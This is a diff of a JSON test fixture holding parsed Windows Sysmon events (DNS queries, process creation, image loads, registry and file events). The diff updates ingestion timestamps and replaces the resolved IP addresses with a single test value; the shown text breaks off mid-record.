-20840,12 +20568,12 @@ "type": "CNAME" }, { - "data": "40.77.232.95", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "network": { 
@@ -20861,13 +20589,13 @@ "tsfe.trafficshaping.dsp.mp.microsoft.com" ], "ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313990763Z", + "ingested": "2021-12-09T13:49:44.740095Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:39:03.685Z", 
@@ -20939,7 +20667,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313992119Z", + "ingested": "2021-12-09T13:49:44.740099700Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:22.432153100Z'/\u003e\u003cEventRecordID\u003e221\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:20.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003eisatap.local.crowbird.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21010,7 +20738,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313993492Z", + "ingested": "2021-12-09T13:49:44.740104800Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:42.554539300Z'/\u003e\u003cEventRecordID\u003e230\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:40.504\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e9f7-5d2f-0000-001031039c00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e676\u003c/Data\u003e\u003cData Name='QueryName'\u003epuppet\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21081,7 +20809,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313994793Z", + "ingested": "2021-12-09T13:49:44.740109600Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:40:42.447293700Z'/\u003e\u003cEventRecordID\u003e231\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:40:40.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-001016f70000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e636\u003c/Data\u003e\u003cData Name='QueryName'\u003ewpad\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21155,12 +20883,12 @@ "type": "CNAME" }, { - "data": "65.55.44.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "network": { 
@@ -21178,13 +20906,13 @@ "v10.vortex-win.data.microsoft.com" ], "ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313996155Z", + "ingested": "2021-12-09T13:49:44.740113400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:42:55.556Z", @@ -21248,12 +20976,12 @@ "type": "CNAME" }, { - "data": "20.36.218.63", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "network": { 
@@ -21269,13 +20997,13 @@ "settings-win.data.microsoft.com" ], "ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313997422Z", + "ingested": "2021-12-09T13:49:44.740118100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:43:06.459Z", 
@@ -21371,7 +21099,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313998691Z", + "ingested": "2021-12-09T13:49:44.740122Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-27T20:00:14.324234100Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='7144' ThreadID='6876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-27 20:00:14.320\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-7c4e-5f98-5803-000000000500}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\notepad.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.475 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eNotepad\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eNOTEPAD.EXE\u003c/Data\u003e\u003cData Name='CommandLine'\u003e\"C:\\Windows\\system32\\notepad.exe\" \u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Users\\vagrant\\\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT\\vagrant\u003c/Data\u003e\u003cData 
Name='LogonGuid'\u003e{9f32b55f-6fdd-5f98-e7c9-020000000000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x2c9e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e1\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eMedium\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=B6D237154F2E528F0B503B58B025862D66B02B73\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{9f32b55f-6fdf-5f98-7000-000000000500}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e4212\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\explorer.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21427,7 +21155,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-10-14T04:10:32.314000020Z", + "ingested": "2021-12-09T13:49:44.740125600Z", "code": "25", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e25\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e25\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T14:43:23.551269400Z'/\u003e\u003cEventRecordID\u003e10737797\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='5080'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 14:43:23.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-b78b-6037-6f13-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2628\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Git\\mingw64\\libexec\\git-core\\git.exe\u003c/Data\u003e\u003cData Name='Type'\u003eImage is replaced\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21501,7 +21229,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.314001312Z", + "ingested": "2021-12-09T13:49:44.740129600Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-12T06:48:27.084044200Z'/\u003e\u003cEventRecordID\u003e2243\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1188' ThreadID='1600'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-12 06:48:27.084\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-4664-5eba-91ae-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e820\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\system32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\System32\\LogFiles\\Scm\\8b34f644-f627-47e7-98e0-957ba1c5eb6d\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=5A9BDDF83BE530B481F0FD24DB28A6FF,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21595,7 +21323,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314002566Z", + "ingested": "2021-12-09T13:49:44.740132900Z", "code": "7", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e7\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e7\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-28T02:39:26.388325200Z'/\u003e\u003cEventRecordID\u003e10685\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1676' ThreadID='4796'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-28 02:39:26.374\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-d9de-5f98-f006-000000000600}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5184\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\dllhost.exe\u003c/Data\u003e\u003cData Name='ImageLoaded'\u003eC:\\Windows\\System32\\IDStore.dll\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.1 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eIdentity Store\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eIdStore.dll\u003c/Data\u003e\u003cData 
Name='Hashes'\u003eSHA1=9955A1C071C44A7CEECC0D928A9CFB7F64CC3F93,MD5=C7C45610F644906E6F7D664EF2E45B08,SHA256=4808F1101F4E42387D8DDB7A355668BAE3BF6F781C42D3BCD82E23446B1DEB3E,IMPHASH=194F3797B52231028C718B6D776C6853\u003c/Data\u003e\u003cData Name='Signed'\u003etrue\u003c/Data\u003e\u003cData Name='Signature'\u003eMicrosoft Windows\u003c/Data\u003e\u003cData Name='SignatureStatus'\u003eValid\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -21655,7 +21383,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314003830Z", + "ingested": "2021-12-09T13:49:44.740137300Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818869100Z'/\u003e\u003cEventRecordID\u003e2691\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary 